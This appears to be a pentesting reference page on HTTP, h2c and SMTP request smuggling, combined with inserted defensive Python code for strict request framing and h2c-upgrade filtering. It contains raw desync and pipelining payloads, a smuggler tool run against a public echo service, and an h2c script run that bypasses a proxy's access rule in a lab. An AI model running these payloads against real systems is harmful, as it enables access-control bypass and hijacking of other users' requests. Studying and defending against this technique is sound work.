Request Smuggling

Using a forward proxy in front of two different backends, it may be possible to chunk a single request just right so that it is split into two separate requests that are sent to different backends.

Use the Burp Plugin

More Examples:

Payloads

https://www.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
Example python Pipelining code

Simple Pipelining Example:

GET /sum.jsp?a=1&b=1&c=2&d=2 HTTP/1.0
Host: example.com:8080
Connection: keep-alive

POST /sum.jsp?a=5&b=5 HTTP/1.1
Host: example.com:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

c=6&d=6

Combined Pipelining Example:

POST /sum.jsp?a=5&b=5 HTTP/1.1
Host: example.com:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

c=2&d=2GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0
Host: example.com:8080
Connection: keep-alive

GET with Content-Length Pipelining Example:

GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0
Host: example.com:8080
Content-Length: 10

1234567890POST /sum.jsp?a=5&b=5 %0D
Content-Type: application/x-www-form-urlencoded
Host: example.com:8080
Content-Length: 30

user=admin&password=abc123
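Each of the three payloads above works only because the front end and the backend disagree about where one request ends and the next begins. The following is an added example in Python, not code from this page, from the slides it links or from the smuggler/Burp tooling it references: a strict HTTP/1.1 request framer of the kind a front end should run, which splits a pipelined byte stream into exactly one request per declared length and refuses the ambiguities that make desync possible (Content-Length and Transfer-Encoding together, conflicting Content-Length values, whitespace mutations around a field name such as the tab/space prefixes the smuggler output further down probes) as well as the short-body case in the third payload. All sample streams are constructed from the payloads above with CRLF line endings; `example.com:8080` is the page's own placeholder host.

```python
import re

TCHAR = re.compile(rb"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")  # RFC 7230 field-name bytes
HEXNUM = re.compile(rb"^[0-9A-Fa-f]+$")


class FramingError(Exception):
    """Ambiguous, malformed or incomplete request framing."""


def parse_head(head):
    """Split a request line plus headers (CRLF separated, no trailing blank line)."""
    lines, headers = head.split(b"\r\n"), []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        # Rejects obs-fold (leading SP/HTAB), "\tTransfer-Encoding" and "Transfer-Encoding "
        if not sep or not TCHAR.match(name):
            raise FramingError("malformed header line: %r" % line)
        headers.append((name.lower(), value.strip(b" \t")))
    return lines[0], headers


def declared_length(headers):
    """("cl", n), ("chunked", None) or (None, None); never two answers at once."""
    cl = [v for n, v in headers if n == b"content-length"]
    te = [v for n, v in headers if n == b"transfer-encoding"]
    if te and cl:
        raise FramingError("Content-Length and Transfer-Encoding both present")
    if te:
        if b",".join(te).split(b",")[-1].strip().lower() != b"chunked":
            raise FramingError("final transfer coding is not chunked: %r" % te)
        return "chunked", None
    if cl:
        if len(set(cl)) != 1 or not cl[0].isdigit():
            raise FramingError("conflicting or non-numeric Content-Length: %r" % cl)
        return "cl", int(cl[0])
    return None, None


def read_chunked(buf, pos):
    """Decode a chunked body starting at pos; return (body, position after it)."""
    body = b""
    while True:
        end = buf.find(b"\r\n", pos)
        size_field = buf[pos:end].split(b";")[0].strip() if end >= 0 else b""
        if not HEXNUM.match(size_field):
            raise FramingError("bad or missing chunk size: %r" % size_field)
        size, pos = int(size_field, 16), end + 2
        if size == 0:  # last-chunk CRLF, optional trailers, then the final CRLF
            end = buf.find(b"\r\n\r\n", pos - 2)
            if end < 0:
                raise FramingError("incomplete chunked trailer")
            return body, end + 4
        if buf[pos + size:pos + size + 2] != b"\r\n":
            raise FramingError("truncated chunk")
        body, pos = body + buf[pos:pos + size], pos + size + 2


def split_pipeline(buf):
    """Frame every request in a pipelined stream, one unambiguous length each."""
    requests, pos = [], 0
    while pos < len(buf):
        end = buf.find(b"\r\n\r\n", pos)
        if end < 0:
            raise FramingError("incomplete header block at offset %d" % pos)
        request_line, headers = parse_head(buf[pos:end])
        kind, n = declared_length(headers)
        pos = end + 4
        if kind == "chunked":
            body, pos = read_chunked(buf, pos)
        elif kind == "cl":
            if len(buf) - pos < n:
                raise FramingError("body needs %d bytes, only %d arrived" % (n, len(buf) - pos))
            body, pos = buf[pos:pos + n], pos + n
        else:
            body = b""
        requests.append((request_line, headers, body))
    return requests


def frame_or_reject(buf):
    """("ok", requests) or ("reject", reason), for callers that log instead of raise."""
    try:
        return "ok", split_pipeline(buf)
    except FramingError as exc:
        return "reject", str(exc)


# Constructed sample streams (CRLF endings), not captured traffic. Combined example
# from the page: Content-Length: 7 ends the POST body at "c=2&d=2", so the "GET ..."
# bytes are framed as a second request.
COMBINED = (
    b"POST /sum.jsp?a=5&b=5 HTTP/1.1\r\nHost: example.com:8080\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 7\r\n\r\n"
    b"c=2&d=2GET /sum.jsp?a=5&b=5&c=6&d=6 HTTP/1.0\r\nHost: example.com:8080\r\n"
    b"Connection: keep-alive\r\n\r\n"
)
# Third example from the page: Content-Length: 30 but only 26 body bytes arrive.
TRUNCATED = (
    b"POST /sum.jsp?a=5&b=5 HTTP/1.1\r\nHost: example.com:8080\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 30\r\n\r\n"
    b"user=admin&password=abc123"
)
# Both length headers at once (CL.TE / TE.CL), and a field-name mutation of the
# kind the smuggler output below probes (a space before the colon).
AMBIGUOUS = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 4\r\n"
             b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n")
SPACE_BEFORE_COLON = (b"POST / HTTP/1.1\r\nHost: example.com\r\n"
                      b"Transfer-Encoding : chunked\r\n\r\n0\r\n\r\n")
```

Run `frame_or_reject(COMBINED)` and it returns two framed requests; `TRUNCATED`, `AMBIGUOUS` and `SPACE_BEFORE_COLON` each come back as a rejection with the reason. The point for a defender is that every rejection here is a request a lenient parser would have accepted with a guess, and two hops guessing differently is the whole bug; a front end that refuses rather than guesses, and logs the reason, both closes the desync and gives you a detection signal.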

HTTP Smuggling

Smuggler Script

Example:

python smuggler.py -u 'https://postman-echo.com/post?foo1=bar1&foo2=bar2'

  ______                 _     _
 / _____)               | |   | |
( (____  ____  _   _  ____ ____| | _____  ____
 \____ \|    \| | | |/ _  |/ _  | || ___ |/ ___)
 _____) ) | | | |_| ( (_| ( (_| | || ____| |
(______/|_|_|_|____/ \___ |\___ |\_)_____)_|
                    (_____(_____|

        @defparam       v1.1

[+] URL        : https://postman-echo.com/post?foo1=bar1&foo2=bar2
[+] Method     : POST
[+] Endpoint   : /post?foo1=bar1&foo2=bar2
[+] Configfile : default.py
[+] Timeout    : 5.0 seconds
[+] Cookies    : 1 (Appending to the attack)
[nameprefix1]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[tabprefix1]   : OK (TECL: 0.09 - 501) (CLTE: 0.07 - 501)
[tabprefix2]   : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[space1]       : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[midspace-01]  : OK (TECL: 0.06 - 501) (CLTE: 0.07 - 501)
[postspace-01] : OK (TECL: 0.08 - 400) (CLTE: 0.08 - 400)
[prespace-01]  : OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[endspace-01]  : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[xprespace-01] : OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400)
[endspacex-01] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[rxprespace-01]: OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[xnprespace-01]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacerx-01]: OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[endspacexn-01]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[midspace-04]  : OK (TECL: 0.07 - 501) (CLTE: 0.08 - 501)
[postspace-04] : OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[prespace-04]  : OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400)
[endspace-04]  : OK (TECL: 0.06 - 501) (CLTE: 0.06 - 501)
[xprespace-04] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacex-04] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[rxprespace-04]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[xnprespace-04]: OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400)
[endspacerx-04]: OK (TECL: 0.06 - 400) (CLTE: 0.08 - 400)
[endspacexn-04]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[midspace-08]  : OK (TECL: 0.06 - 501) (CLTE: 0.06 - 501)
[postspace-08] : OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[prespace-08]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-08]  : OK (TECL: 0.06 - 501) (CLTE: 0.06 - 501)
[xprespace-08] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacex-08] : OK (TECL: 0.07 - 501) (CLTE: 0.08 - 501)
[rxprespace-08]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[xnprespace-08]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-08]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-08]: OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[midspace-09]  : OK (TECL: 0.06 - 501) (CLTE: 0.07 - 501)
[postspace-09] : OK (TECL: 0.06 - 400) (CLTE: 0.06 - 400)
[prespace-09]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-09]  : OK (TECL: 0.08 - 501) (CLTE: 0.06 - 501)
[xprespace-09] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacex-09] : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[rxprespace-09]: OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[xnprespace-09]: OK (TECL: 0.07 - 200) (CLTE: 0.06 - 200)
[endspacerx-09]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-09]: OK (TECL: 0.06 - 501) (CLTE: 0.08 - 501)
[midspace-0a]  : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[postspace-0a] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[prespace-0a]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-0a]  : OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[xprespace-0a] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacex-0a] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[rxprespace-0a]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[xnprespace-0a]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-0a]: OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacexn-0a]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[midspace-0b]  : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[postspace-0b] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-0b]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-0b]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[xprespace-0b] : OK (TECL: 0.07 - 400) (CLTE: 0.09 - 400)
[endspacex-0b] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[rxprespace-0b]: OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[xnprespace-0b]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-0b]: OK (TECL: 0.07 - 400) (CLTE: 0.05 - 400)
[endspacexn-0b]: OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[midspace-0c]  : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[postspace-0c] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-0c]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-0c]  : OK (TECL: 0.07 - 501) (CLTE: 0.06 - 501)
[xprespace-0c] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacex-0c] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[rxprespace-0c]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[xnprespace-0c]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacerx-0c]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-0c]: OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[midspace-0d]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[postspace-0d] : OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[prespace-0d]  : OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[endspace-0d]  : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[xprespace-0d] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacex-0d] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[rxprespace-0d]: OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[xnprespace-0d]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[endspacerx-0d]: OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[endspacexn-0d]: OK (TECL: 0.08 - 200) (CLTE: 0.06 - 200)
[midspace-1f]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[postspace-1f] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-1f]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-1f]  : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[xprespace-1f] : OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[endspacex-1f] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[rxprespace-1f]: OK (TECL: 0.06 - 400) (CLTE: 0.07 - 400)
[xnprespace-1f]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-1f]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-1f]: OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[midspace-20]  : OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[postspace-20] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-20]  : OK (TECL: 0.08 - 400) (CLTE: 0.06 - 400)
[endspace-20]  : OK (TECL: 0.08 - 200) (CLTE: 0.07 - 200)
[xprespace-20] : OK (TECL: 0.08 - 200) (CLTE: 0.07 - 200)
[endspacex-20] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[rxprespace-20]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[xnprespace-20]: OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacerx-20]: OK (TECL: 0.08 - 400) (CLTE: 0.08 - 400)
[endspacexn-20]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[midspace-7f]  : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[postspace-7f] : OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[prespace-7f]  : OK (TECL: 0.06 - 400) (CLTE: 0.06 - 400)
[endspace-7f]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[xprespace-7f] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacex-7f] : OK (TECL: 0.06 - 501) (CLTE: 0.08 - 501)
[rxprespace-7f]: OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[xnprespace-7f]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacerx-7f]: OK (TECL: 0.07 - 400) (CLTE: 0.06 - 400)
[endspacexn-7f]: OK (TECL: 0.06 - 501) (CLTE: 0.07 - 501)
[midspace-a0]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[postspace-a0] : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[prespace-a0]  : OK (TECL: 0.09 - 400) (CLTE: 0.07 - 400)
[endspace-a0]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[xprespace-a0] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacex-a0] : OK (TECL: 0.08 - 501) (CLTE: 0.07 - 501)
[rxprespace-a0]: OK (TECL: 0.06 - 400) (CLTE: 0.08 - 400)
[xnprespace-a0]: OK (TECL: 0.07 - 200) (CLTE: 0.08 - 200)
[endspacerx-a0]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspacexn-a0]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[midspace-ff]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[postspace-ff] : OK (TECL: 0.08 - 400) (CLTE: 0.07 - 400)
[prespace-ff]  : OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[endspace-ff]  : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[xprespace-ff] : OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacex-ff] : OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)
[rxprespace-ff]: OK (TECL: 0.07 - 400) (CLTE: 0.07 - 400)
[xnprespace-ff]: OK (TECL: 0.07 - 200) (CLTE: 0.07 - 200)
[endspacerx-ff]: OK (TECL: 0.07 - 400) (CLTE: 0.08 - 400)
[endspacexn-ff]: OK (TECL: 0.07 - 501) (CLTE: 0.07 - 501)

Hitting other services

https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142

WebSocket Smuggling

https://github.com/0ang3el/websocket-smuggle

HTTP/2 Request Smuggling

https://blog.assetnote.io/2021/03/18/h2c-smuggling/
https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c

Initial request to the endpoint (blocked by the proxy's path rule):

>>> curl -ik https://localhost:8001/flag
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

H2C Script:

>>> /h2csmuggler.py -x https://localhost:8001 http://backend/flag
[INFO] h2c stream established successfully.
:status: 200
content-type: text/plain; charset=utf-8
content-length: 20
date: Mon, 05 Apr 2021 18:04:54 GMT

Hello, /, http: true

[INFO] Requesting - /flag
:status: 200
content-type: text/plain; charset=utf-8
content-length: 17
date: Mon, 05 Apr 2021 18:04:54 GMT

You got the flag!
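The h2c run above succeeds because the front end relayed the client's `Upgrade: h2c` handshake to the backend instead of handling it itself; once the backend switches the connection to cleartext HTTP/2, every later request travels through a tunnel the proxy's path rule (the 403 on /flag) never sees. The following is an added Python example, not code from this page, from h2csmuggler or from any proxy named in the linked posts: the two checks a proxy that terminates HTTP/1.1 itself should apply before forwarding a request, namely noticing an h2c upgrade attempt so it can answer or refuse it at the edge, and stripping hop-by-hop headers (RFC 7230 section 6.1, plus everything listed in `Connection:`) so that `Upgrade` and `HTTP2-Settings` are never relayed. The request headers are constructed; the HTTP2-Settings value is a labelled placeholder, not a real SETTINGS payload.

```python
# Hop-by-hop fields from RFC 7230 section 6.1: they describe this connection
# only and must not be relayed to the next hop.
HOP_BY_HOP = {"connection", "keep-alive", "proxy-connection", "te", "trailer",
              "transfer-encoding", "upgrade", "proxy-authorization", "proxy-authenticate"}


def tokens(value):
    """Comma-separated header tokens, trimmed and lower-cased."""
    return [t.strip().lower() for t in value.split(",") if t.strip()]


def requests_h2c_upgrade(headers):
    """True when the client asks to switch this connection to cleartext HTTP/2."""
    return any(n.lower() == "upgrade" and "h2c" in tokens(v) for n, v in headers)


def forwardable_headers(headers):
    """Return (kept, dropped): the client headers a proxy may relay upstream.
    Every field named in Connection: is hop-by-hop too, so "Connection: Upgrade,
    HTTP2-Settings" takes HTTP2-Settings out along with Upgrade itself."""
    drop = set(HOP_BY_HOP)
    for name, value in headers:
        if name.lower() == "connection":
            drop.update(tokens(value))
    kept, dropped = [], []
    for name, value in headers:
        (dropped if name.lower() in drop else kept).append((name, value))
    return kept, dropped


def proxy_decision(headers):
    """Edge policy: refuse protocol switches outright, otherwise relay only the
    end-to-end headers. Returns ("refuse", reason) or ("forward", kept)."""
    if requests_h2c_upgrade(headers):
        return "refuse", "h2c upgrade must be terminated or rejected at the edge"
    kept, _ = forwardable_headers(headers)
    return "forward", kept


# Constructed sample: an h2c upgrade request as a client sends it to the front end.
# The HTTP2-Settings value is a placeholder, not a real base64url SETTINGS frame.
H2C_REQUEST = [
    ("Host", "localhost:8001"),
    ("Upgrade", "h2c"),
    ("HTTP2-Settings", "PLACEHOLDER_BASE64URL_SETTINGS"),
    ("Connection", "Upgrade, HTTP2-Settings"),
    ("Accept", "*/*"),
]
# Constructed sample: an ordinary request with a keep-alive hint.
PLAIN_REQUEST = [
    ("Host", "localhost:8001"),
    ("Connection", "keep-alive"),
    ("Accept", "*/*"),
]

if __name__ == "__main__":
    for label, req in (("h2c", H2C_REQUEST), ("plain", PLAIN_REQUEST)):
        print(label, proxy_decision(req))
        print(label, "stripped:", forwardable_headers(req)[1])
```

Either half on its own narrows the hole: a proxy that refuses upgrades never opens the tunnel, and a proxy that strips `Connection`-listed fields never lets the backend see the handshake even if the refusal is misconfigured. Doing both, and logging refusals, also turns an h2c probe into a visible event rather than a silent bypass.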

SMTP Smuggling

https://www.redpacketsecurity.com/smtp-smuggling-new-flaw-lets-attackers-bypass-security-and-spoof-emails/